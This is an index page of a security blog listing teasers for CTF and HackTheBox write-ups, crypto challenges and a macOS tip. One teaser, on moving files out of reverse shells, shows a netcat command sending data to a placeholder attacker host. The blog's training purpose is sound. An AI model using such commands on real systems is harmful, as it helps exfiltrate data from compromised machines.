• Home
  • About
Subscribe

ØxOPOSɆC - HTTP2
oposec

ØxOPOSɆC - HTTP2

URL: https://20.56.49.147/ | Keep calm and get the flag :)When you enter the IP directly on the browser you see only an image sourced from Github and a hidden clue: "Lost? It's evolution, baby...": The image shows the evolution of the HTTP protocol, so it makes sense

  • Inês Martins
Inês Martins May 28, 2021 • 2 min read
Fixing keyboard type on Big Sur
macOS

Fixing keyboard type on Big Sur

It seems like Big Sur is randomly defaulting the keyboard type to ANSI and, for some weird reason, Apple has removed the ability to change this directly on the keyboard settings. What to do?Apparently, the only thing to do is to force the OS to re-configure the keyboard: Go

  • Inês Martins
Inês Martins May 15, 2021 • 1 min read
ØxOPOSɆC - Don Joe [Crypto]
crypto

ØxOPOSɆC - Don Joe [Crypto]

Don Joe insists his site is as secure as can be! Can you prove that the best web dev of all time is wrong?" URL: https://don-joes-blog.herokuapp.com/ There are two flagsDon Joe's Blog has a very simple interface and lists only 4 blog posts: Clicking on the articles

  • Inês Martins
Inês Martins May 1, 2021 • 4 min read
HTB Write-up | Time
htb

HTB Write-up | Time

Retired machine can be found here.ScanningIt seems like this machine is running OpenSSH on port 22 and an Apache web server on port 80: ~ nmap -sC -sV time.htb PORT STATE SERVICE VERSION PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux;

  • Inês Martins
Inês Martins Apr 3, 2021 • 3 min read
ØxOPOSɆC - Secrets [Crypto]
cryptography

ØxOPOSɆC - Secrets [Crypto]

We all have secrets! And sometimes we need to share them with our online friends, safely... That's easy! - Just implement a very secure, hackerproof™ secret sharing web application!" URL: https://secret.mbie.meWhen you access the website you see the following page: Entering random data on the input field

  • Inês Martins
Inês Martins Mar 24, 2021 • 3 min read
HTB Write-up | Passage

HTB Write-up | Passage

Write-up for Passage, a retired HTB machine.

  • Inês Martins
Inês Martins Mar 7, 2021 • 5 min read
ØxOPOSɆC | Neuromancer
ctf

ØxOPOSɆC | Neuromancer

This month, I was responsible for putting together the ØxOPOSɆC monthly challenge. Even though the competition is done, if you want to try it out yourself the application is still available here. So, if you don't want spoilers, stop reading! Onto the solutions!The challenge consisted of a Heroku app

  • Inês Martins
Inês Martins Feb 23, 2021 • 3 min read
ØxOPOSɆC | Underground Leaks - Part III

ØxOPOSɆC | Underground Leaks - Part III

This level starts with the email message where the last level ended: When we go to the link at the end of the message we see a simple HTML page that contains a <meta> tag that uses the http-equiv attribute: <html> <body> <b&

  • Inês Martins
Inês Martins Jan 30, 2021 • 5 min read
ØxOPOSɆC | Underground Leaks (Crypto) - Part II
crypto

ØxOPOSɆC | Underground Leaks (Crypto) - Part II

Write-up for the second part of the Underground Leaks saga, that includes DTMF and Multi-tap Cipher.

  • Inês Martins
Inês Martins Dec 9, 2020 • 1 min read
HTB Crypto Challenge | Call
crypto

HTB Crypto Challenge | Call

Write-up for retired HTB crypto challenge that involves DTFM and Prime Numbers Cipher.

  • Inês Martins
Inês Martins Nov 22, 2020 • 1 min read
HTB Write-up | Tabby
htb

HTB Write-up | Tabby

Write-up for Tabby, a retired HTB machine.

  • Inês Martins
Inês Martins Nov 7, 2020 • 4 min read
ØxOPOSɆC | Underground Leaks (Crypto)
crypto

ØxOPOSɆC | Underground Leaks (Crypto)

Write-up for retired Oposec's October challenge

  • Inês Martins
Inês Martins Oct 27, 2020 • 5 min read
HTB Crypto Challenge | Bank Heist
crypto

HTB Crypto Challenge | Bank Heist

Write-up for retired HTB crypto challenge that involves Multi-tap code and Atbash Cipher.

  • Inês Martins
Inês Martins Oct 22, 2020 • 1 min read
HTB Write-up | Admirer
htb

HTB Write-up | Admirer

Write-up for Adminer, a retired HTB machine.

  • Inês Martins
Inês Martins Oct 22, 2020 • 9 min read
HTB Write-up | Cache
htb

HTB Write-up | Cache

Write-up for Cache, a retired HTB machine.

  • Inês Martins
Inês Martins Oct 22, 2020 • 9 min read
HTB Write-up  | Blunder
htb

HTB Write-up | Blunder

Retired machine can be found here. ScanningScanning with nmap only retrieved an Apache web server running on port 80. ~ nmap -sV -sC -A blunder.htb Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-12 10:13 WEST Nmap scan report for blunder.htb (10.10.10.191) Host is up

  • Inês Martins
Inês Martins Oct 22, 2020 • 5 min read
ØxOPOSɆC Summer Challenge 2020 | Misc Challenges Write-up
sstv

ØxOPOSɆC Summer Challenge 2020 | Misc Challenges Write-up

1 . My Paste | 100Oh no! I forgot where I left my paste. 🗑 Perhaps you can help me find it?The source code has a little hidden clue: <span class="challenge-desc"><br> Oh no! I forgot where I left my paste. 🗑 <p>Perhaps you can

  • Inês Martins
Inês Martins Sep 25, 2020 • 3 min read
ØxOPOSɆC Summer Challenge 2020 | Crypto Challenges Write-up
tap code

ØxOPOSɆC Summer Challenge 2020 | Crypto Challenges Write-up

Knock Knock (100)21 31 11 22 { 32 11 44 15 45 43 42 34 43 15 }If I had known about Tap Code (aka Knock Code) this would have been straightforward. I ended up getting the flag with some "leaps of logic". Basically, by knowing that the first 4

  • Inês Martins
Inês Martins Sep 25, 2020 • 2 min read
ØxOPOSɆC Summer Challenge 2020 | Web Challenges Write-up
web

ØxOPOSɆC Summer Challenge 2020 | Web Challenges Write-up

Passive-Aggressive Flask (100)I can give you a flag, but you'll have to be nice. Remember to say it LOUD, so I can hear you. https://passiveaggressive.apl3b.com~ curl https://passiveaggressive.apl3b.com <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"

  • Inês Martins
Inês Martins Sep 24, 2020 • 3 min read
HTB Write-up | Magic

HTB Write-up | Magic

Retired machine can be found here. ScanningAs always, we start with some basic scanning which discloses only an instance of OpenSSH running on port 22 and an Apache web server running on port 80 - pretty typical stuff. ~ nmap -sV -sC -A magic.htb Starting Nmap 7.80 ( https://nmap.

  • Inês Martins
Inês Martins Aug 27, 2020 • 4 min read
HTB Write-up | Traceback
htb

HTB Write-up | Traceback

Retired machine can be found here. ScanningThe scanning gives us very little: an instance of OpenSSH running on port 22 and an Apache server running on port 80 with the title "Help us". ~ nmap -sV -sC -A traceback.htb Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-13 22:58

  • Inês Martins
Inês Martins Aug 27, 2020 • 4 min read
Downloading files from reverse shells using netcat

Downloading files from reverse shells using netcat

Banner source: https://www.newyorker.com/culture/onward-and-upward-in-the-garden/the-lost-art-of-stealing-fruit It's very common that I'm working with a reverse shell and can't use scp to upload or download files, which leads me to Googling this netcat syntax. Well, no more! On the remote shell: ~ nc -w 3 ATTACKER_IP ATTACKER_PORT

  • Inês Martins
Inês Martins Jul 9, 2020 • 1 min read
Web Assembly CTF Write-up
web-assembly

Web Assembly CTF Write-up

Banner source: https://medium.com/trainingcenter/webassembly-a-jornada-o-que-%C3%A9-wasm-75e3f0f03124 I'm been trying to get into Web Assembly for a while, so when I found this CTF write-up by Chiam YJ I decided to give it a try. The original Challenge<!DOCTYPE html> <html> <head>

  • Inês Martins
Inês Martins Jun 23, 2020 • 4 min read
ØxOPOSɆC Baby Xmas Challenge 2019 | Android Rev
android

ØxOPOSɆC Baby Xmas Challenge 2019 | Android Rev

The APK for the original challenge can be downloaded here. The author's write-up can be downloaded here. We're given an Android Package (xmas_ctfzadas.apk) along with the following instructions: Baby pwn tu-tu-tu-tu! - Get the first two flags ({oposec}XPTO) locally; - For the brave ones, find a way

  • Inês Martins
Inês Martins Jun 13, 2020 • 4 min read
HTB Write-up | Resolute
windows

HTB Write-up | Resolute

The retired machine can be found here. Official write-up can be downloaded here. I started with some basic scanning with nmap that found that most likely this machine was a Domain Controller, since it had all the required ports open. $ nmap -sC -sV 10.10.10.169 -Pn 53/tcp

  • Inês Martins
Inês Martins Jun 8, 2020 • 3 min read
© 2025
Powered by Ghost